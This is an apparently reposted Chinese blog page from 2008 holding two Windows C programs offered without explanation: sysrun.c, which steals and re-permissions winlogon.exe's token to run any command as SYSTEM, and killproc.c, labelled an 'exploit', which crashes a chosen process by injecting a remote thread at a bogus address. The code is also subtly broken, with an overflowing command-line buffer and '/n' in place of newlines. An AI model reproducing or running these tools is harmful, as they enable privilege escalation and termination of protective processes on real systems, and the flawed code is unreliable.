您的位置：首页 > 其它

"SYSTEM"用户创建进程

2008-06-05 11:51 435 查看

sysrun.c

cl sysrun.cpp Shlwapi.lib advapi32.lib

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <aclapi.h>

#pragma comment(lib,"Shlwapi.lib")

BOOL EnableDebugPriv(LPCTSTR szPrivilege)
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
return FALSE;
}
if (!LookupPrivilegeValue(NULL, szPrivilege, &sedebugnameValue))
{
CloseHandle(hToken);
return FALSE;
}

tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL))
{
CloseHandle(hToken);
return FALSE;
}

return TRUE;
}

DWORD GetProcessId(LPCTSTR szProcName)
{
PROCESSENTRY32 pe;
DWORD dwPid;
DWORD dwRet;
BOOL bFound = FALSE;

HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSP)
{
pe.dwSize = sizeof(pe);

for (dwRet = Process32First(hSP, &pe);
dwRet;
dwRet = Process32Next(hSP, &pe))
{

if (StrCmpNI(szProcName, pe.szExeFile, strlen(szProcName)) == 0)
{
dwPid = pe.th32ProcessID;
bFound = TRUE;
break;
}
}

CloseHandle(hSP);

if (bFound == TRUE)
{
return dwPid;
}
}

return NULL;
}

BOOL
CreateSystemProcess(LPTSTR szProcessName)
{
HANDLE hProcess;
HANDLE hToken, hNewToken;
DWORD dwPid;

PACL pOldDAcl = NULL;
PACL pNewDAcl = NULL;
BOOL bDAcl;
BOOL bDefDAcl;
DWORD dwRet;

PACL pSacl = NULL;
PSID pSidOwner = NULL;
PSID pSidPrimary = NULL;
DWORD dwAclSize = 0;
DWORD dwSaclSize = 0;
DWORD dwSidOwnLen = 0;
DWORD dwSidPrimLen = 0;

DWORD dwSDLen;
EXPLICIT_ACCESS ea;
PSECURITY_DESCRIPTOR pOrigSd = NULL;
PSECURITY_DESCRIPTOR pNewSd = NULL;

STARTUPINFO si;
PROCESS_INFORMATION pi;

BOOL bRet = true;

if (!EnableDebugPriv("SeDebugPrivilege"))
{
printf("EnableDebugPriv() failed!/n");
bRet = false;
goto Cleanup;
}

if ((dwPid = GetProcessId("WINLOGON.EXE")) == NULL)
{
printf("GetProcessId() failed!/n");
bRet = false;
goto Cleanup;
}

hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
if (hProcess == NULL)
{
printf("OpenProcess() = %d/n", GetLastError() );

bRet = false;
goto Cleanup;
}

if (!OpenProcessToken( hProcess, READ_CONTROL|WRITE_DAC, &hToken ))
{
printf("OpenProcessToken() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

ZeroMemory(&ea, sizeof( EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea,
"Everyone",
TOKEN_ALL_ACCESS,
GRANT_ACCESS,
0);

if (!GetKernelObjectSecurity(hToken,
DACL_SECURITY_INFORMATION,
pOrigSd,
0,
&dwSDLen))
{

if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)
{
pOrigSd = (PSECURITY_DESCRIPTOR) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSDLen);
if (pOrigSd == NULL)
{
printf("HeapAlloc failed: pSd /n");

bRet = false;
goto Cleanup;
}
if (!GetKernelObjectSecurity(hToken,
DACL_SECURITY_INFORMATION,
pOrigSd,
dwSDLen,
&dwSDLen))
{
printf("GetKernelObjectSecurity() = %d/n", GetLastError());
bRet = false;
goto Cleanup;
}
}
else
{
printf("GetKernelObjectSecurity() = %d/n", GetLastError());
bRet = false;
goto Cleanup;
}
}

if (!GetSecurityDescriptorDacl(pOrigSd, &bDAcl, &pOldDAcl, &bDefDAcl))
{
printf("GetSecurityDescriptorDacl() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

dwRet = SetEntriesInAcl(1, &ea, pOldDAcl, &pNewDAcl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl() = %d/n", GetLastError());
pNewDAcl = NULL;

bRet = false;
goto Cleanup;
}

if (!MakeAbsoluteSD(pOrigSd,
pNewSd,
&dwSDLen,
pOldDAcl,
&dwAclSize,
pSacl,
&dwSaclSize,
pSidOwner,
&dwSidOwnLen,
pSidPrimary,
&dwSidPrimLen))
{

if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)
{
pOldDAcl = (PACL) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwAclSize);
pSacl = (PACL) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSaclSize);
pSidOwner = (PSID) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSidOwnLen);
pSidPrimary = (PSID) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSidPrimLen);
pNewSd = (PSECURITY_DESCRIPTOR) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSDLen);

if (pOldDAcl == NULL||
pSacl == NULL||
pSidOwner == NULL||
pSidPrimary == NULL||
pNewSd == NULL )
{
printf("HeapAlloc SID or ACL failed!/n");

bRet = false;
goto Cleanup;
}

if (!MakeAbsoluteSD(pOrigSd,
pNewSd,
&dwSDLen,
pOldDAcl,
&dwAclSize,
pSacl,
&dwSaclSize,
pSidOwner,
&dwSidOwnLen,
pSidPrimary,
&dwSidPrimLen))
{
printf("MakeAbsoluteSD() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}
}
else
{
printf("MakeAbsoluteSD() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}
}

if (!SetSecurityDescriptorDacl( pNewSd, bDAcl, pNewDAcl, bDefDAcl))
{
printf("SetSecurityDescriptorDacl() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

if (!SetKernelObjectSecurity( hToken, DACL_SECURITY_INFORMATION, pNewSd))
{
printf("SetKernelObjectSecurity() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

if (!OpenProcessToken( hProcess, TOKEN_ALL_ACCESS, &hToken))
{
printf("OpenProcessToken() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

if (!DuplicateTokenEx(hToken,
TOKEN_ALL_ACCESS,
NULL,
SecurityImpersonation,
TokenPrimary,
&hNewToken))
{
printf("DuplicateTokenEx() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);

ImpersonateLoggedOnUser(hNewToken);

if (!CreateProcessAsUser(hNewToken,
NULL,
szProcessName,
NULL,
NULL,
FALSE,
NULL,//NORMAL_PRIORITY_CLASS|CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi))
{
printf("CreateProcessAsUser() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}
WaitForSingleObject(pi.hProcess, INFINITE);

Cleanup:
if (pOrigSd)
{
HeapFree(GetProcessHeap(), 0, pOrigSd );
}
if (pNewSd)
{
HeapFree(GetProcessHeap(), 0, pNewSd );
}
if (pSidPrimary)
{
HeapFree(GetProcessHeap(), 0, pSidPrimary);
}
if (pSidOwner)
{
HeapFree(GetProcessHeap(), 0, pSidOwner);
}
if (pSacl)
{
HeapFree(GetProcessHeap(), 0, pSacl);
}
if (pOldDAcl)
{
HeapFree(GetProcessHeap(), 0, pOldDAcl);
}

CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseHandle(hToken);
CloseHandle(hNewToken);
CloseHandle(hProcess);
return bRet;
}

void main(int argc, char** argv)
{
if (argc<2)
{
printf("Usage %s filename.exe/n", argv[0]);
return;
}
char cmdLine[] = "/0";

strcpy(cmdLine,argv[1]);
strcat(cmdLine," ");
for(int i=1;i<(argc-1);i++)
{
strcat(cmdLine,argv[i+1]);
strcat(cmdLine," ");
}
strcat(cmdLine,"/0");
printf(cmdLine);
if (CreateSystemProcess(cmdLine) == FALSE)
{
printf("CreateSystemProcess() failed!/n");
}
return;
}

Nooby

killproc.c

cl killproc.c Shlwapi.lib advapi32.lib

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <aclapi.h>

#pragma comment(lib,"Shlwapi.lib")

/*
BOOL EnableDebugPriv( LPCTSTR szPrivilege )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if ( !OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken ) )
{
return FALSE;
}
if ( !LookupPrivilegeValue( NULL, szPrivilege, &sedebugnameValue ) )
{
CloseHandle( hToken );
return FALSE;
}

tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if ( !AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
{
CloseHandle( hToken );
return FALSE;
}

return TRUE;
}
*/
BOOL exploit(char* chProcessName)
{

HANDLE hProcessSnap = NULL;

HANDLE hProcess = NULL;

BOOL bFound = FALSE;

BOOL bRet = FALSE;

PROCESSENTRY32 pe32 = {0};

UINT uExitCode = 0;

DWORD dwExitCode = 0;

LPDWORD lpExitCode = &dwExitCode;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);

pe32.dwSize = sizeof(PROCESSENTRY32);

printf("Searching for process... /n");

while(!bFound && Process32Next(hProcessSnap, &pe32))
{
if(lstrcmpi(pe32.szExeFile, chProcessName) == 0)
bFound = TRUE;

}

CloseHandle(hProcessSnap);

if(!bFound){

printf("Process not found. /n");

return(FALSE);

}
printf("Process found. /n");

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);

if(hProcess == NULL){

printf("Write access denied for this process. /n");
printf("Exploit failed. /n");

return(FALSE);
}

printf("Write access is allowed /n");

printf("Send exploit to process.../n");

CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0);

printf("Success. /n");

return(pe32.th32ProcessID);
}

int main(int argc,char **argv)
{
char* chProcess = argv[1];

if(argc < 2) {

printf("/n");
printf("Usage: killproc.exe <process name> /n");

}
else
{
//if ( !EnableDebugPriv("SeDebugPrivilege") )
// printf("EnableDebugPriv() failed!/n");

exploit(chProcess);
}

}

内容来自用户分享和网络整理，不保证内容的准确性，如有侵权内容，可联系管理员处理

标签：

相关文章推荐

新的分享

章节导航

&quot;SYSTEM&quot;用户创建进程

"SYSTEM"用户创建进程